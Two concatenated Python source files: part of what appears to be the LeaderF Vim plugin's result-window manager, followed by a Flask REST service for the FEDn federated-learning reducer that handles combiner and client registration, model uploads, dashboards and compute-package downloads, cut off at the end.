dir_changed_by_autocmd = False if need_exit: self._setAutochdir() if dir_changed_by_autocmd == False: self._restoreOrigCwd() return None else: self._beforeExit() self._content = vim.current.buffer[:] return False def _jumpNext(self): instance = self._getInstance() if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length: return False if instance.isReverseOrder(): if instance.window.valid: if instance.window.cursor[0] > len(instance.buffer) - self._help_length: instance.window.cursor = (len(instance.buffer) - self._help_length, 0) elif instance.window.cursor[0] == 1: # at the first line instance.window.cursor = (len(instance.buffer) - self._help_length, 0) else: instance.window.cursor = (instance.window.cursor[0] - 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow > len(instance.buffer) - instance.helpLength: instance.cursorRow = len(instance.buffer) - instance.helpLength elif instance.cursorRow == 1: # at the last line instance.cursorRow = len(instance.buffer) - instance.helpLength else: instance.cursorRow -= 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength)) else: if instance.window.valid: if instance.window.cursor[0] <= self._help_length: instance.window.cursor = (self._help_length + 1, 0) elif instance.window.cursor[0] == len(instance.buffer): # at the last line instance.window.cursor = (self._help_length + 1, 0) else: instance.window.cursor = (instance.window.cursor[0] + 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow <= instance.helpLength: instance.cursorRow = instance.helpLength + 1 elif instance.cursorRow == len(instance.buffer): # at the last line instance.cursorRow = instance.helpLength + 1 else: instance.cursorRow += 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength)) return True def _jumpPrevious(self): instance = self._getInstance() if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length: return False if instance.isReverseOrder(): if instance.window.valid: if instance.window.cursor[0] >= len(instance.buffer) - self._help_length: instance.window.cursor = (1, 0) else: instance.window.cursor = (instance.window.cursor[0] + 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow >= len(instance.buffer) - instance.helpLength: instance.cursorRow = 1 else: instance.cursorRow += 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength)) else: if instance.window.valid: if instance.window.cursor[0] <= self._help_length + 1: instance.window.cursor = (len(instance.buffer), 0) else: instance.window.cursor = (instance.window.cursor[0] - 1, 0) instance.window.options["cursorline"] = True instance.gotoOriginalWindow() self._accept(instance.buffer[instance.window.cursor[0] - 1], "") else: if instance.cursorRow <= instance.helpLength + 1: instance.cursorRow = len(instance.buffer) else: instance.cursorRow -= 1 self._accept(instance.buffer[instance.cursorRow - 1], "") lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \ (instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength)) def quit(self): self._getInstance().exitBuffer() self._setAutochdir() self._restoreOrigCwd() def refresh(self, normal_mode=True): self._getExplorer().cleanup() content = self._getExplorer().getFreshContent() if not content: lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE") return if normal_mode: # when called in Normal mode self._getInstance().buffer.options['modifiable'] = True self._clearHighlights() self._clearHighlightsPos() self.clearSelections() self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) self._iteration_end = True if self._cli.pattern: self._index = 0 self._search(self._content) if normal_mode: # when called in Normal mode self._createHelpHint() self._resetHighlights() self._getInstance().buffer.options['modifiable'] = False def addSelections(self): nr = self._getInstance().window.number if (int(lfEval("v:mouse_win")) != 0 and nr != int(lfEval("v:mouse_win"))): return elif nr == int(lfEval("v:mouse_win")): lfCmd("exec v:mouse_lnum") lfCmd("exec 'norm!'.v:mouse_col.'|'") line_nr = self._getInstance().window.cursor[0] if line_nr <= self._help_length: lfCmd("norm! j") return if line_nr in self._selections: lfCmd("call matchdelete(%d)" % self._selections[line_nr]) del self._selections[line_nr] else: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr)) self._selections[line_nr] = id def selectMulti(self): orig_line = self._getInstance().window.cursor[0] nr = self._getInstance().window.number if (int(lfEval("v:mouse_win")) != 0 and nr != int(lfEval("v:mouse_win"))): return elif nr == int(lfEval("v:mouse_win")): cur_line = int(lfEval("v:mouse_lnum")) self.clearSelections() for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1): if i > self._help_length and i not in self._selections: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i))) self._selections[i] = id def selectAll(self): line_num = len(self._getInstance().buffer) if line_num > 300: lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE") lfCmd("sleep 1") return for i in range(line_num): if i >= self._help_length and i+1 not in self._selections: id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1))) self._selections[i+1] = id def startExplorer(self, win_pos, *args, **kwargs): arguments_dict = kwargs.get("arguments", {}) self.setArguments(arguments_dict) self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly()) self._cli.setRefineFeature(self._supportsRefine()) if self._getExplorer().getStlCategory() in ["Gtags"]: if "--update" in self._arguments or "--remove" in self._arguments: self._getExplorer().getContent(*args, **kwargs) return if "--next" in arguments_dict: if self._jumpNext() == False: lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE") return elif "--previous" in arguments_dict: if self._jumpPrevious() == False: lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE") return # lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE") if self._getExplorer().getStlCategory() in ["Rg", "Gtags"] and "--recall" in self._arguments: content = self._content else: content = self._getExplorer().getContent(*args, **kwargs) self._getInstance().setCwd(os.getcwd()) if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \ and isinstance(content, list) and len(content) == 1: mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else "" self._accept(content[0], mode) return if not content: lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE") return self._getInstance().setArguments(self._arguments) if self._getExplorer().getStlCategory() in ["Rg"] and ("-A" in arguments_dict \ or "-B" in arguments_dict or "-C" in arguments_dict): self._getInstance().ignoreReverse() self._getInstance().enterBuffer(win_pos) self._initial_count = self._getInstance().getInitialWinHeight() self._getInstance().setStlCategory(self._getExplorer().getStlCategory()) self._setStlMode(**kwargs) self._getInstance().setStlCwd(self._getExplorer().getStlCurDir()) if lfEval("g:Lf_RememberLastSearch") == '1' and self._launched and self._cli.pattern: pass else: lfCmd("normal! gg") self._index = 0 self._pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0] self._cli.setPattern(self._pattern) self._start_time = time.time() self._bang_start_time = self._start_time self._status_start_time = self._start_time self._bang_count = 0 self._read_content_exception = None if isinstance(content, list): self._is_content_list = True if len(content[0]) == len(content[0].rstrip("\r\n")): self._content = content else: self._content = [line.rstrip("\r\n") for line in content] self._getInstance().setStlTotal(len(self._content)//self._getUnit()) self._result_content = self._content self._getInstance().setStlResultsCount(len(self._content)) if lfEval("g:Lf_RememberLastSearch") == '1' and self._launched and self._cli.pattern: pass else: self._getInstance().setBuffer(self._content[:self._initial_count]) if lfEval("has('nvim')") == '1': lfCmd("redrawstatus") self._callback = self._workInIdle if not kwargs.get('bang', 0): self.input() else: self._getInstance().appendBuffer(self._content[self._initial_count:]) lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() elif isinstance(content, AsyncExecutor.Result): self._is_content_list = False self._result_content = [] self._callback = self._workInIdle if lfEval("g:Lf_CursorBlink") == '0': self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) else: if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]: if "--append" in self.getArguments(): self._offset_in_content = len(self._content) if self._pattern_bak: self._getInstance().setBuffer(self._content) self._createHelpHint() else: self._getInstance().clearBuffer() self._content = [] self._offset_in_content = 0 else: self._content = [] self._offset_in_content = 0 self._read_finished = 0 self._stop_reader_thread = False self._reader_thread = threading.Thread(target=self._readContent, args=(content,)) self._reader_thread.daemon = True self._reader_thread.start() if not kwargs.get('bang', 0): self.input() else: lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() else: self._is_content_list = False self._result_content = [] self._callback = partial(self._workInIdle, content) if lfEval("g:Lf_CursorBlink") == '0': self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent) else: self._content = [] self._offset_in_content = 0 self._read_finished = 0 if not kwargs.get('bang', 0): self.input() else: lfCmd("echo") self._getInstance().buffer.options['modifiable'] = False self._bangEnter() self._launched = True def _readContent(self, content): try: for line in content: self._content.append(line) if self._stop_reader_thread: break else: self._read_finished = 1 except Exception: self._read_finished = 1 self._read_content_exception = sys.exc_info() def _setResultContent(self): if len(self._result_content) > len(self._getInstance().buffer): self._getInstance().setBuffer(self._result_content) elif self._index == 0: self._getInstance().setBuffer(self._content) def _workInIdle(self, content=None, bang=False): if self._read_content_exception is not None: if bang == True: if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None lfPrintError(self._read_content_exception[1]) return else: raise self._read_content_exception[1] if self._is_content_list: if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0): if self._fuzzy_engine: step = 10000 * cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content, True, step) return if content: i = -1 for i, line in enumerate(itertools.islice(content, 20)): self._content.append(line) if i == -1: self._read_finished = 1 if self._read_finished > 0: if self._read_finished == 1: self._read_finished += 1 self._getExplorer().setContent(self._content) if self._cli.pattern: self._getInstance().setStlResultsCount(len(self._result_content)) else: if bang: if self._getInstance().empty(): self._offset_in_content = len(self._content) self._getInstance().appendBuffer(self._content[:self._offset_in_content]) else: cur_len = len(self._content) self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len]) self._offset_in_content = cur_len if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None self._bangReadFinished() lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE") else: self._getInstance().setBuffer(self._content[:self._initial_count]) self._getInstance().setStlTotal(len(self._content)//self._getUnit()) self._getInstance().setStlRunning(False) self._getInstance().setStlResultsCount(len(self._content)) lfCmd("redrawstatus") if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0): if self._fuzzy_engine: step = 10000 * cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content, True, step) else: cur_len = len(self._content) if time.time() - self._start_time > 0.1: self._start_time = time.time() self._getInstance().setStlTotal(cur_len//self._getUnit()) if time.time() - self._status_start_time > 0.45: self._status_start_time = time.time() self._getInstance().setStlRunning(True) if self._cli.pattern: self._getInstance().setStlResultsCount(len(self._result_content)) else: self._getInstance().setStlResultsCount(cur_len) lfCmd("redrawstatus") if self._cli.pattern: if self._index < cur_len or len(self._cb_content) > 0: if self._fuzzy_engine: step = 10000 * cpu_count elif is_fuzzyMatch_C: step = 10000 else: step = 2000 self._search(self._content[:cur_len], True, step) else: if bang: if self._getInstance().empty(): self._offset_in_content = len(self._content) self._getInstance().appendBuffer(self._content[:self._offset_in_content]) else: cur_len = len(self._content) self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len]) self._offset_in_content = cur_len if time.time() - self._bang_start_time > 0.5: self._bang_start_time = time.time() lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count)) self._bang_count = (self._bang_count + 1) % 9 elif len(self._getInstance().buffer) < min(cur_len, self._initial_count): self._getInstance().setBuffer(self._content[:self._initial_count]) @modifiableController def input(self): if self._timer_id is not None: lfCmd("call timer_stop(%s)" % self._timer_id) self._timer_id = None self._hideHelp() self._resetHighlights() if self._pattern: self._search(self._content) for cmd in self._cli.input(self._callback): cur_len = len(self._content) cur_content = self._content[:cur_len] if equal(cmd, '<Update>'): self._search(cur_content) elif equal(cmd, '<Shorten>'): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<Mode>'): self._setStlMode() if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning if self._cli.pattern: self._search(cur_content) elif equal(cmd, '<C-K>'): self._toUp() self._previewResult(False) elif equal(cmd, '<C-J>'): self._toDown() self._previewResult(False) elif equal(cmd, '<Up>'): if self._cli.previousHistory(self._getExplorer().getStlCategory()): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<Down>'): if self._cli.nextHistory(self._getExplorer().getStlCategory()): if self._getInstance().isReverseOrder(): lfCmd("normal! G") else: lfCmd("normal! gg") self._index = 0 # search from beginning self._search(cur_content) elif equal(cmd, '<LeftMouse>'): if self._leftClick(): break self._previewResult(False) elif equal(cmd, '<2-LeftMouse>'): self._leftClick() if self.accept() is None: break elif equal(cmd, '<CR>'): if self.accept() is None: break elif equal(cmd, '<C-X>'): if self.accept('h') is None: break elif equal(cmd, '<C-]>'): if self.accept('v') is None: break elif equal(cmd, '<C-T>'): if self.accept('t') is None: break elif equal(cmd, '<Quit>'): self._cli.writeHistory(self._getExplorer().getStlCategory()) self.quit() break elif equal(cmd, '<Tab>'): # switch to Normal mode self._setResultContent() self.clearSelections() self._cli.hideCursor() self._createHelpHint() self._resetHighlights() if self._getInstance().isReverseOrder() and self._cli.pattern \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() break elif equal(cmd, '<F5>'): self.refresh(False) elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'): if self._getExplorer().supportsMulti(): self.addSelections() elif equal(cmd, '<S-LeftMouse>'): if self._getExplorer().supportsMulti(): self.selectMulti() elif equal(cmd, '<C-A>'): if self._getExplorer().supportsMulti(): self.selectAll() elif equal(cmd, '<C-L>'): self.clearSelections() elif equal(cmd, '<C-P>'): self._ctrlp_pressed = True self._previewResult(True) self._ctrlp_pressed = False elif equal(cmd, '<PageUp>'): self._pageUp() self._previewResult(False) elif equal(cmd, '<PageDown>'): self._pageDown() self._previewResult(False) else: if self._cmdExtension(cmd): break # vim: set ts=4 sw=4 tw=0 et :
restservice.py
from fedn.clients.reducer.interfaces import CombinerInterface from fedn.clients.reducer.state import ReducerState, ReducerStateToString from flask_wtf.csrf import CSRFProtect from werkzeug.utils import secure_filename from flask import Flask, jsonify, render_template, request from flask import redirect, url_for, flash from threading import Lock import json import plotly import pandas as pd import numpy import math import plotly.express as px import geoip2.database from fedn.clients.reducer.plots import Plot UPLOAD_FOLDER = '/app/client/package/' ALLOWED_EXTENSIONS = {'gz', 'bz2', 'tar', 'zip', 'tgz'} def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS class ReducerRestService: def __init__(self, config, control, certificate_manager, certificate=None): print("config object!: \n\n\n\n{}".format(config)) if config['discover_host']: self.name = config['discover_host'] else: self.name = config['name'] self.port = config['discover_port'] self.network_id = config['name'] + '-network' if not config['token']: import uuid self.token = str(uuid.uuid4()) else: self.token = config['token'] self.control = control self.certificate = certificate self.certificate_manager = certificate_manager self.current_compute_context = None # self.control.get_compute_context() def to_dict(self): data = { 'name': self.name } return data def check_configured(self): if not self.control.get_compute_context(): return render_template('setup.html', client=self.name, state=ReducerStateToString(self.control.state()), logs=None, refresh=False, message='') if self.control.state() == ReducerState.setup: return render_template('setup.html', client=self.name, state=ReducerStateToString(self.control.state()), logs=None, refresh=True, message='Warning. Reducer is not base-configured. please do so with config file.') if not self.control.get_latest_model(): return render_template('setup_model.html', message="Please set the initial model.") return None def run(self): app = Flask(__name__) app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER csrf = CSRFProtect() import os SECRET_KEY = os.urandom(32) app.config['SECRET_KEY'] = SECRET_KEY csrf.init_app(app) @app.route('/') def index(): not_configured = self.check_configured() if not_configured: return not_configured events = self.control.get_events() message = request.args.get('message', None) message_type = request.args.get('message_type', None) return render_template('events.html', client=self.name, state=ReducerStateToString(self.control.state()), events=events, logs=None, refresh=True, configured=True, message=message, message_type=message_type) # http://localhost:8090/add?name=combiner&address=combiner&port=12080&token=e9a3cb4c5eaff546eec33ff68a7fbe232b68a192 @app.route('/status') def status(): return {'state': ReducerStateToString(self.control.state())} @app.route('/netgraph') def netgraph(): result = {'nodes': [], 'edges': []} result['nodes'].append({ "id": "r0", "label": "Reducer", "x": -1.2, "y": 0, "size": 25, "type": 'reducer', }) x = 0 y = 0 count = 0 meta = {} combiner_info = [] for combiner in self.control.network.get_combiners(): try: report = combiner.report() combiner_info.append(report) except: pass y = y + 0.5 width = 5 if len(combiner_info) < 1: return result step = 5 / len(combiner_info) x = -width / 3.0 for combiner in combiner_info: print("combiner info {}".format(combiner_info), flush=True) try: result['nodes'].append({ "id": combiner['name'], # "n{}".format(count), "label": "Combiner ({} clients)".format(combiner['nr_active_clients']), "x": x, "y": y, "size": 15, "name": combiner['name'], "type": 'combiner', # "color":'blue', }) except Exception as err: print(err) x = x + step count = count + 1 y = y + 0.25 count = 0 width = 5 step = 5 / len(combiner_info) x = -width / 2.0 # for combiner in self.control.statestore.list_clients(): for combiner in combiner_info: for a in range(0, int(combiner['nr_active_clients'])): # y = y + 0.25 try: result['nodes'].append({ "id": "c{}".format(count), "label": "Client", "x": x, "y": y, "size": 15, "name": "c{}".format(count), "combiner": combiner['name'], "type": 'client', # "color":'blue', }) except Exception as err: print(err) # print("combiner prefferred name {}".format(client['combiner']), flush=True) x = x + 0.25 count = count + 1 count = 0 for node in result['nodes']: try: if node['type'] == 'combiner': result['edges'].append( { "id": "e{}".format(count), "source": node['id'], "target": 'r0', } ) elif node['type'] == 'client': result['edges'].append( { "id": "e{}".format(count), "source": node['combiner'], "target": node['id'], } ) except Exception as e: pass count = count + 1 return result @app.route('/events') def events(): import json from bson import json_util json_docs = [] for doc in self.control.get_events(): json_doc = json.dumps(doc, default=json_util.default) json_docs.append(json_doc) json_docs.reverse() return {'events': json_docs} @app.route('/add') def add(): """ Add a combiner to the network. """ if self.control.state() == ReducerState.setup: return jsonify({'status': 'retry'}) # TODO check for get variables name = request.args.get('name', None) address = str(request.args.get('address', None)) port = request.args.get('port', None) # token = request.args.get('token') # TODO do validation if port is None or address is None or name is None: return "Please specify correct parameters." # Try to retrieve combiner from db combiner = self.control.network.get_combiner(name) if not combiner: # Create a new combiner import base64 certificate, key = self.certificate_manager.get_or_create(address).get_keypair_raw() cert_b64 = base64.b64encode(certificate) key_b64 = base64.b64encode(key) # TODO append and redirect to index. import copy combiner = CombinerInterface(self, name, address, port, copy.deepcopy(certificate), copy.deepcopy(key), request.remote_addr) self.control.network.add_combiner(combiner) combiner = self.control.network.get_combiner(name) ret = { 'status': 'added', 'certificate': combiner['certificate'], 'key': combiner['key'], 'storage': self.control.statestore.get_storage_backend(), 'statestore': self.control.statestore.get_config(), } return jsonify(ret) @app.route('/eula', methods=['GET', 'POST']) def eula(): for r in request.headers: print("header contains: {}".format(r), flush=True) return render_template('eula.html', configured=True) @app.route('/models', methods=['GET', 'POST']) def models(): if request.method == 'POST': # upload seed file uploaded_seed = request.files['seed'] if uploaded_seed: from io import BytesIO a = BytesIO() a.seek(0, 0) uploaded_seed.seek(0) a.write(uploaded_seed.read()) helper = self.control.get_helper() model = helper.load_model_from_BytesIO(a.getbuffer()) self.control.commit(uploaded_seed.filename, model) else: not_configured = self.check_configured() if not_configured: return not_configured h_latest_model_id = self.control.get_latest_model() model_info = self.control.get_model_info() return render_template('models.html', h_latest_model_id=h_latest_model_id, seed=True, model_info=model_info, configured=True) seed = True return redirect(url_for('models', seed=seed)) @app.route('/delete_model_trail', methods=['GET', 'POST']) def delete_model_trail(): if request.method == 'POST': from fedn.common.tracer.mongotracer import MongoTracer statestore_config = self.control.statestore.get_config() self.tracer = MongoTracer(statestore_config['mongo_config'], statestore_config['network_id']) try: self.control.drop_models() except: pass # drop objects in minio self.control.delete_bucket_objects() return redirect(url_for('models')) seed = True return redirect(url_for('models', seed=seed)) @app.route('/drop_control', methods=['GET', 'POST']) def drop_control(): if request.method == 'POST': self.control.statestore.drop_control() return redirect(url_for('control')) return redirect(url_for('control')) # http://localhost:8090/control?rounds=4&model_id=879fa112-c861-4cb1-a25d-775153e5b548 @app.route('/control', methods=['GET', 'POST']) def control(): not_configured = self.check_configured() if not_configured: return not_configured client = self.name state = ReducerStateToString(self.control.state()) logs = None refresh = True try: self.current_compute_context = self.control.get_compute_context() except: self.current_compute_context = None if self.current_compute_context == None or self.current_compute_context == '': return render_template('setup.html', client=client, state=state, logs=logs, refresh=False, message='No compute context is set. Please set one here <a href="/context">/context</a>') if self.control.state() == ReducerState.setup: return render_template('setup.html', client=client, state=state, logs=logs, refresh=refresh, message='Warning. Reducer is not base-configured. please do so with config file.') if self.control.state() == ReducerState.monitoring: return redirect( url_for('index', state=state, refresh=refresh, message="Reducer is in monitoring state")) if request.method == 'POST': timeout = float(request.form.get('timeout', 180)) rounds = int(request.form.get('rounds', 1)) task = (request.form.get('task', '')) clients_required = request.form.get('clients_required', 1) clients_requested = request.form.get('clients_requested', 8) # checking if there are enough clients connected to start! clients_available = 0 try: for combiner in self.control.network.get_combiners(): if combiner.allowing_clients(): combiner_state = combiner.report() nac = combiner_state['nr_active_clients'] clients_available = clients_available + int(nac) except Exception as e: pass if clients_available < clients_required: return redirect(url_for('index', state=state, message="Not enough clients available to start rounds.", message_type='warning')) validate = request.form.get('validate', False) if validate == 'False': validate = False helper_type = request.form.get('helper', 'keras') # self.control.statestore.set_framework(helper_type) latest_model_id = self.control.get_latest_model() config = {'round_timeout': timeout, 'model_id': latest_model_id, 'rounds': rounds, 'clients_required': clients_required, 'clients_requested': clients_requested, 'task': task, 'validate': validate, 'helper_type': helper_type} import threading threading.Thread(target=self.control.instruct, args=(config,)).start() # self.control.instruct(config) return redirect(url_for('index', state=state, refresh=refresh, message="Sent execution plan.", message_type='SUCCESS')) else: seed_model_id = None latest_model_id = None try: seed_model_id = self.control.get_first_model()[0] latest_model_id = self.control.get_latest_model() except Exception as e: pass return render_template('index.html', latest_model_id=latest_model_id, compute_package=self.current_compute_context, seed_model_id=seed_model_id, helper=self.control.statestore.get_framework(), validate=True, configured=True) client = self.name state = ReducerStateToString(self.control.state()) logs = None refresh = False return render_template('index.html', client=client, state=state, logs=logs, refresh=refresh, configured=True) @app.route('/assign') def assign(): """Handle client assignment requests. """ if self.control.state() == ReducerState.setup: return jsonify({'status': 'retry'}) name = request.args.get('name', None) combiner_preferred = request.args.get('combiner', None) if combiner_preferred: combiner = self.control.find(combiner_preferred) else: combiner = self.control.find_available_combiner() if combiner is None: return jsonify({'status': 'retry'}) ## Check that a framework has been selected prior to assigning clients. framework = self.control.statestore.get_framework() if not framework: return jsonify({'status': 'retry'}) client = { 'name': name, 'combiner_preferred': combiner_preferred, 'combiner': combiner.name, 'ip': request.remote_addr, 'status': 'available' } self.control.network.add_client(client) if combiner: import base64 cert_b64 = base64.b64encode(combiner.certificate) response = { 'status': 'assigned', 'host': combiner.address, 'ip': combiner.ip, 'port': combiner.port, 'certificate': str(cert_b64).split('\'')[1], 'model_type': self.control.statestore.get_framework() } return jsonify(response) elif combiner is None: return jsonify({'status': 'retry'}) return jsonify({'status': 'retry'}) @app.route('/infer') def infer(): if self.control.state() == ReducerState.setup: return "Error, not configured" result = "" try: self.control.set_model_id() except fedn.exceptions.ModelError: print("Failed to seed control.") return result def combiner_stats(): combiner_info = [] for combiner in self.control.network.get_combiners(): try: report = combiner.report() combiner_info.append(report) except: pass return combiner_info return False def create_map(): cities_dict = { 'city': [], 'lat': [], 'lon': [], 'country': [], 'name': [], 'role': [], 'size': [] } from fedn import get_data dbpath = get_data('geolite2/GeoLite2-City.mmdb') with geoip2.database.Reader(dbpath) as reader: for combiner in self.control.statestore.list_combiners(): try: response = reader.city(combiner['ip']) cities_dict['city'].append(response.city.name) r = 1.0 # Rougly 100km w = r * math.sqrt(numpy.random.random()) t = 2.0 * math.pi * numpy.random.random() x = w * math.cos(t) y = w * math.sin(t) lat = str(float(response.location.latitude) + x) lon = str(float(response.location.longitude) + y) cities_dict['lat'].append(lat) cities_dict['lon'].append(lon) cities_dict['country'].append(response.country.iso_code) cities_dict['name'].append(combiner['name']) cities_dict['role'].append('Combiner') cities_dict['size'].append(10) except geoip2.errors.AddressNotFoundError as err: print(err) with geoip2.database.Reader(dbpath) as reader: for client in self.control.statestore.list_clients(): try: response = reader.city(client['ip']) cities_dict['city'].append(response.city.name) cities_dict['lat'].append(response.location.latitude) cities_dict['lon'].append(response.location.longitude) cities_dict['country'].append(response.country.iso_code) cities_dict['name'].append(client['name']) cities_dict['role'].append('Client') # TODO: Optionally relate to data size cities_dict['size'].append(6) except geoip2.errors.AddressNotFoundError as err: print(err) config = self.control.statestore.get_config() cities_df = pd.DataFrame(cities_dict) if cities_df.empty: return False fig = px.scatter_geo(cities_df, lon="lon", lat="lat", projection="natural earth", color="role", size="size", hover_name="city", hover_data={"city": False, "lon": False, "lat": False, 'size': False, 'name': True, 'role': True}) fig.update_geos(fitbounds="locations", showcountries=True) fig.update_layout(title="FEDn network: {}".format(config['network_id'])) fig = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder) return fig @app.route('/metric_type', methods=['GET', 'POST']) def change_features(): feature = request.args['selected'] plot = Plot(self.control.statestore) graphJSON = plot.create_box_plot(feature) return graphJSON @app.route('/dashboard') def dashboard(): not_configured = self.check_configured() if not_configured: return not_configured plot = Plot(self.control.statestore) try: valid_metrics = plot.fetch_valid_metrics() box_plot = plot.create_box_plot(valid_metrics[0]) except Exception as e: valid_metrics = None box_plot = None print(e, flush=True) table_plot = plot.create_table_plot() # timeline_plot = plot.create_timeline_plot() timeline_plot = None clients_plot = plot.create_client_plot() return render_template('dashboard.html', show_plot=True, box_plot=box_plot, table_plot=table_plot, timeline_plot=timeline_plot, clients_plot=clients_plot, metrics=valid_metrics, configured=True ) @app.route('/network') def network(): not_configured = self.check_configured() if not_configured: return not_configured plot = Plot(self.control.statestore) round_time_plot = plot.create_round_plot() mem_cpu_plot = plot.create_cpu_plot() combiners_plot = plot.create_combiner_plot() map_plot = create_map() combiner_info = combiner_stats() return render_template('network.html', map_plot=map_plot, network_plot=True, round_time_plot=round_time_plot, mem_cpu_plot=mem_cpu_plot, combiners_plot=combiners_plot, combiner_info=combiner_info, configured=True ) @app.route('/config/download', methods=['GET']) def config_download(): chk_string = "" name = self.control.get_compute_context() if name is None or name == '': chk_string = '' else: file_path = os.path.join(UPLOAD_FOLDER, name) print("trying to get {}".format(file_path)) from fedn.utils.checksum import md5 try: sum = str(md5(file_path)) except FileNotFoundError as e: sum = '' chk_string = "checksum: {}".format(sum) network_id = self.network_id discover_host = self.name discover_port = self.port token = self.token ctx = """network_id: {network_id} controller: discover_host: {discover_host} discover_port: {discover_port} token: {token} {chk_string}""".format(network_id=network_id, discover_host=discover_host, discover_port=discover_port, token=token, chk_string=chk_string) from io import BytesIO from flask import send_file obj = BytesIO() obj.write(ctx.encode('UTF-8')) obj.seek(0) return send_file(obj, as_attachment=True, attachment_filename='client.yaml', mimetype='application/x-yaml') @app.route('/context', methods=['GET', 'POST']) @csrf.exempt # TODO fix csrf token to form posting in package.py def context(): # if self.control.state() != ReducerState.setup or self.control.state() != ReducerState.idle: # return "Error, Context already assigned!" reset = request.args.get('reset', None) # if reset is not empty then allow context re-set if reset: return render_template('context.html') if request.method == 'POST': if 'file' not in request.files: flash('No file part') return redirect(url_for('context')) file = request.files['file'] helper_type = request.form.get('helper', 'keras') # if user does not select file, browser also # submit an empty part without filename if file.filename == '': flash('No selected file') return redirect(url_for('context')) if file and allowed_file(file.filename): filename = secure_filename(file.filename) file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename) file.save(file_path) if self.control.state() == ReducerState.instructing or self.control.state() == ReducerState.monitoring: return "Not allowed to change context while execution is ongoing." self.control.set_compute_context(filename, file_path) self.control.statestore.set_framework(helper_type) return redirect(url_for('control')) from flask import send_from_directory name = request.args.get('name', '') if name == '': name = self.control.get_compute_context() if name == None or name == '': return render_template('context.html') # There is a potential race condition here, if one client requests a package and at # the same time another one triggers a fetch from Minio and writes to disk. try: mutex = Lock() mutex.acquire() return send_from_directory(app.config['UPLOAD_FOLDER'], name, as_attachment=True) except: try: data = self.control.get_compute_package(name) file_path = os.path.join(app.config['UPLOAD_FOLDER'], name) with open(file_path, 'wb') as fh: fh.write(data) return send_from_directory(app.config['UPLOAD_FOLDER'], name, as_attachment=True) except: raise finally: mutex.release() return render_template('context.html') @app.route('/checksum', methods=['GET', 'POST']) def checksum(): #sum = '' name = request.args.get('name', None) if name == '' or name is None: name = self.control.get_compute_context() if name == None or name == '': return jsonify({}) file_path = os.path.join(UPLOAD_FOLDER, name) print("trying to get {}".format(file_path)) from fedn.utils.checksum import md5 try: sum = str(md5(file_path)) except FileNotFoundError as e: sum = '' data = {'checksum': sum} from flask import jsonify return jsonify(data) if self.certificate: print("trying to connect 